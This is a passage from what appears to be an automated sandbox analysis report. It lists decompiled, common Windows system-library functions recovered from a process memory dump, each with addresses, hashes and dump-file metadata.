				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E02AA7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E02ACB640(E02AC9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x02b414fb
0x02b414fb
0x02b4150a
0x02b41514
0x02b41519
0x02b4151b
0x02b41526
0x02b4152c
0x02b41534
0x02b41537
0x02b4153a
0x02b41545
0x02b41557
0x02b41547
0x02b41550
0x02b41550
0x02b41562
0x02b41563
0x02b41565
0x02b4156a
0x02b4157f

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 049f4a6ad92aedfc27960c0c9b099c8b5341f449da54a522c86de984231cea45
Instruction ID: a76454cae3424e01fa0b59d5d2a7e8d5e1c6e16a995803cc17556f1f3f449aa9
Opcode Fuzzy Hash: 049f4a6ad92aedfc27960c0c9b099c8b5341f449da54a522c86de984231cea45
Instruction Fuzzy Hash: 0A019271E40248AFCB00DF69D941EAEB7B8EF44700F10405AF915EB280DA70DA40CB94

Uniqueness

Uniqueness Score: -1.00%

Function 02B3FEC0, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E02B3FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x2b7d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E02ACFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E02AA7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E02ACB640(E02AC9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x02b3fec0
0x02b3fec0
0x02b3fecf
0x02b3fed9
0x02b3fede
0x02b3fee0
0x02b3feeb
0x02b3fef3
0x02b3fef6
0x02b3fef9
0x02b3ff04
0x02b3ff16
0x02b3ff06
0x02b3ff0f
0x02b3ff0f
0x02b3ff21
0x02b3ff22
0x02b3ff24
0x02b3ff29
0x02b3ff3e

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 557a972e69f4d2dbb72fb8bee5973c5e02c4ea11d2be33d1e83b60663bfda318
Instruction ID: 1df9c2a0c14c821ed1443cddfe5604cc40694053ef4b821192084d918f32be09
Opcode Fuzzy Hash: 557a972e69f4d2dbb72fb8bee5973c5e02c4ea11d2be33d1e83b60663bfda318
Instruction Fuzzy Hash: DC018471E41208AFCB14DBA9D945FBFB7B9EF44700F10406AB901EB390EE709A11CB94

Uniqueness

Uniqueness Score: -1.00%

Function 02B3FE3F, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E02B3FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x2b7d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E02ACFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E02AA7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E02ACB640(E02AC9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x02b3fe3f
0x02b3fe3f
0x02b3fe4e
0x02b3fe58
0x02b3fe5d
0x02b3fe5f
0x02b3fe6a
0x02b3fe72
0x02b3fe75
0x02b3fe78
0x02b3fe83
0x02b3fe95
0x02b3fe85
0x02b3fe8e
0x02b3fe8e
0x02b3fea0
0x02b3fea1
0x02b3fea3
0x02b3fea8
0x02b3febd

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75de6542310bc10da416b57b547d4f4021ad53f59a4a1c97b6db8ee21193d233
Instruction ID: 84bb801d5af729a80bacab8312f5c5a1d02b0e48de115a92a8218041e6260835
Opcode Fuzzy Hash: 75de6542310bc10da416b57b547d4f4021ad53f59a4a1c97b6db8ee21193d233
Instruction Fuzzy Hash: 38018471E40218AFCB14DFA9D845FBFB7B9EF44704F10406AB904EB291DE749911CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02A9B02A, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02A9B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E02AA7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E02B07016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}

0x02a9b037
0x02a9b039
0x02a9b03b
0x02a9b040
0x02aea60e
0x00000000
0x00000000
0x02aea61d
0x02a9b04b
0x02a9b04e
0x02aea627
0x02aea634
0x00000000
0x00000000
0x02aea641
0x02aea653
0x02aea643
0x02aea64c
0x02aea64c
0x02aea65b
0x00000000
0x00000000
0x00000000
0x02aea66c
0x02a9b057
0x02a9b057
0x02a9b057
0x02a9b046
0x02a9b046
0x00000000

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: 57bf18842a221e588f9ba9fca3d578bf04272f87befd58b84f3cb0588fc11ba2
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: 7401D4712049809FDB22C71ED9C4F6677E8FB41748F0904A5F916CB6A1DF68DC41C630

Uniqueness

Uniqueness Score: -1.00%

Function 02B51074, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02B51074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E02B5165E(__ebx, 0x2b78ae4, (__edx -  *0x2b78b04 >> 0x14) + (__edx -  *0x2b78b04 >> 0x14), __edi, __ecx, (__edx -  *0x2b78b04 >> 0x14) + (__edx -  *0x2b78b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E02B4AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E02AA7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E02B3FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}

0x02b51074
0x02b51080
0x02b51082
0x02b5108a
0x02b5108f
0x02b51093
0x02b510ab
0x02b510ab
0x02b510c3
0x02b510cf
0x02b510e1
0x02b510d1
0x02b510da
0x02b510da
0x02b510e9
0x02b510f5
0x02b510f5
0x02b510fe

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ee1150babfb1798ff9bcbced78e7147c6b857b5054a8b9209e16e821ead9ac8
Instruction ID: 223d30d56c905d75ba438db5813b25bb26c62de673af88cbda14bb0c02c54d68
Opcode Fuzzy Hash: 2ee1150babfb1798ff9bcbced78e7147c6b857b5054a8b9209e16e821ead9ac8
Instruction Fuzzy Hash: 540124725147919FC711EB28C944B1BB7E6EF84314F088AA9FC8A97690EF30D840CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02B58ED6, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E02B58ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x2b7d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E02AA7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E02ACB640(E02AC9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x02b58ed6
0x02b58ee5
0x02b58eed
0x02b58ef0
0x02b58efa
0x02b58f03
0x02b58f0c
0x02b58f15
0x02b58f24
0x02b58f27
0x02b58f31
0x02b58f43
0x02b58f33
0x02b58f3c
0x02b58f3c
0x02b58f4e
0x02b58f4f
0x02b58f51
0x02b58f56
0x02b58f69

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b83442a5f727f4027a69ad4ebe4ccbc0b3b474c65b2f7e6fe671c8e26782557
Instruction ID: 06462a9adf1502ba5f5e2cf5e0a354a288d43906908b7c20916cc44ba0534577
Opcode Fuzzy Hash: 0b83442a5f727f4027a69ad4ebe4ccbc0b3b474c65b2f7e6fe671c8e26782557
Instruction Fuzzy Hash: F211CC70A402599FDB04DFA9D541BAEB7F4FF08300F1446AAE919EB781EA349941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02B58A62, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E02B58A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x2b7d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E02AA7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E02ACB640(E02AC9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x02b58a62
0x02b58a71
0x02b58a79
0x02b58a82
0x02b58a85
0x02b58a89
0x02b58a8c
0x02b58a8f
0x02b58a92
0x02b58a95
0x02b58a9f
0x02b58ab1
0x02b58aa1
0x02b58aaa
0x02b58aaa
0x02b58abc
0x02b58abd
0x02b58abf
0x02b58ac4
0x02b58ada

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62c79cebd8bf3cfff5f0e22e455f9fd98cdafaf42b3b501e3e353c9d999945a6
Instruction ID: 7f220ba6ab0705eebfe3538ea9c3a8ebfafa6e77152053064f72aff56196a608
Opcode Fuzzy Hash: 62c79cebd8bf3cfff5f0e22e455f9fd98cdafaf42b3b501e3e353c9d999945a6
Instruction Fuzzy Hash: 5A012C71A4021DAFCB00DFA9D941AEEB7B8EF48350F10405AFA15FB351EB34A911CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02A8DB60, Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02A8DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E02A8DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E02A8E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L02A8E8B0(__ecx, _t14, 0xfff);
							L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}

0x02a8db64
0x02a8db66
0x02a8db6b
0x02a8dbaa
0x02a8db71
0x02a8db76
0x02a8db7a
0x02a8dba3
0x02a8db7c
0x02a8db87
0x02a8db8b
0x02ae4fa1
0x02ae4fb3
0x02ae4fb8
0x02a8db91
0x02a8db96
0x02a8db98
0x02a8db98
0x02a8db8b
0x02a8db7a
0x02a8db9d
0x02a8dba2

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction ID: 52de59b41a60e05b8f7401456cf967561b12cc62e8d7838f9d5ae59b3fe4d31e
Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction Fuzzy Hash: D7F06833241A62DBD7327B6589C8F6BA6A69FC6A60F150035B3059B284CE608C0296D1

Uniqueness

Uniqueness Score: -1.00%

Function 02A8B1E1, Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02A8B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E02AA7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E02AA7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E02B07016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}

0x02a8b1e8
0x02a8b1ea
0x02a8b1f3
0x02ae4a17
0x02a8b1f9
0x02a8b1f9
0x02a8b1f9
0x02a8b201
0x02ae4a21
0x02ae4a2e
0x00000000
0x00000000
0x02ae4a3b
0x02ae4a4d
0x02ae4a3d
0x02ae4a46
0x02ae4a46
0x02ae4a55
0x00000000
0x00000000
0x00000000
0x02a8b20a
0x02a8b20a
0x02a8b20a
0x02a8b20a

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: bf2080871af0ae08caed9ef3e416289162874022addd04c850f250be40a6b942
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: E10121322006809BC722A35DC884F6ABFA9EF41368F0804A1F911CB2B1EF38C801D625

Uniqueness

Uniqueness Score: -1.00%

Function 02B1FE87, Relevance: .0, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E02B1FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x2b7d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E02AA7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E02ACB640(E02AC9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x02b1fe96
0x02b1fe9e
0x02b1fea1
0x02b1fead
0x02b1feb3
0x02b1feb9
0x02b1fec3
0x02b1fed5
0x02b1fec5
0x02b1fece
0x02b1fece
0x02b1fee0
0x02b1fee1
0x02b1fee3
0x02b1fee8
0x02b1fefb

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b13398c5fdd5b84eb9b690dc8bb3a637a6d19567b4650096d7a494e1af42526e
Instruction ID: f345b926bb71b8f782317a988cba24cf5883db503616f29b281004915e52fdbf
Opcode Fuzzy Hash: b13398c5fdd5b84eb9b690dc8bb3a637a6d19567b4650096d7a494e1af42526e
Instruction Fuzzy Hash: 52016271A40309EFCB14DFA8D542A6EB7F4EF04304F504599A519EB382DA35D901CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02B4131B, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E02B4131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x2b7d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E02AA7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E02ACB640(E02AC9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x02b4131b
0x02b4132a
0x02b41330
0x02b41336
0x02b4133e
0x02b41341
0x02b41344
0x02b4134f
0x02b41361
0x02b41351
0x02b4135a
0x02b4135a
0x02b4136c
0x02b4136d
0x02b4136f
0x02b41374
0x02b41387

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb59f21bb81e7e48878fd3b15951eb777774a6c33149f8df8f41b9994ec11f62
Instruction ID: 790f8b6b592e41579d356139d6e67045dea72248b0d2ffd0b4fde76524635cbf
Opcode Fuzzy Hash: fb59f21bb81e7e48878fd3b15951eb777774a6c33149f8df8f41b9994ec11f62
Instruction Fuzzy Hash: 12013C71E41208AFCB04EFA9D645AAEB7F4FF08700F108099B845EB381EB349A50CB54

Uniqueness

Uniqueness Score: -1.00%

Function 02B58F6A, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E02B58F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x2b7d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E02AA7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E02ACB640(E02AC9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x02b58f6a
0x02b58f79
0x02b58f81
0x02b58f84
0x02b58f8b
0x02b58f91
0x02b58f94
0x02b58f9e
0x02b58fb0
0x02b58fa0
0x02b58fa9
0x02b58fa9
0x02b58fbb
0x02b58fbc
0x02b58fbe
0x02b58fc3
0x02b58fd6

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69f59631dc54168560f1cc6a1182983292281b536fef83e381d68f4bca5b5b83
Instruction ID: cd43fefff9e5556595e1417b0b97de0e83ecc529307d0b9ffc81b8a5f72e9057
Opcode Fuzzy Hash: 69f59631dc54168560f1cc6a1182983292281b536fef83e381d68f4bca5b5b83
Instruction Fuzzy Hash: 68014F74A4020DAFCB00EFA8D645AAEB7F5EF18300F108499B905EB390EB34DA10CF94

Uniqueness

Uniqueness Score: -1.00%

Function 02AAC577, Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02AAC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E02AAC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x2a611cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E02B588F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}

0x02aac577
0x02aac57d
0x02aac581
0x02aac5b5
0x02aac5b9
0x02aac5ce
0x02aac5ce
0x02aac5ca
0x00000000
0x02aac5ca
0x02aac5c4
0x02aac5c8
0x00000000
0x00000000
0x00000000
0x02aac5ad
0x00000000
0x02aac5af

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f5b4e8271bd419e7799a691d78a3443a3d3eb01c4a75e0ef53f0547c370aca6
Instruction ID: 213c5b096d83bca0f30a7956a593cef5ec14abc676a36b912e1845be1a7fe86e
Opcode Fuzzy Hash: 5f5b4e8271bd419e7799a691d78a3443a3d3eb01c4a75e0ef53f0547c370aca6
Instruction Fuzzy Hash: 44F0E9B29D56929FFB32C714C1A4B227FE79F05774F4484A7F41587202DFA4D880C650

Uniqueness

Uniqueness Score: -1.00%

Function 02AC927A, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E02AC927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L02AA4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E02ACFA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E02AC92C6(_t11, _t14);
				}
				return _t11;
			}

0x02ac9295
0x02ac9299
0x02ac929f
0x02ac92aa
0x02ac92ad
0x02ac92ae
0x02ac92af
0x02ac92b0
0x02ac92b4
0x02ac92bb
0x02ac92bb
0x02ac92c5

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: 4647a44e6fffe893c5a8c76e77113ee7afd3e753179f85c9b2d8b5cf74f974eb
Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction Fuzzy Hash: 9EE0ED322806006BE7219F0ACC80F13B6AAAF82720F10407DB9005F282CAE6D8088BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B42073, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

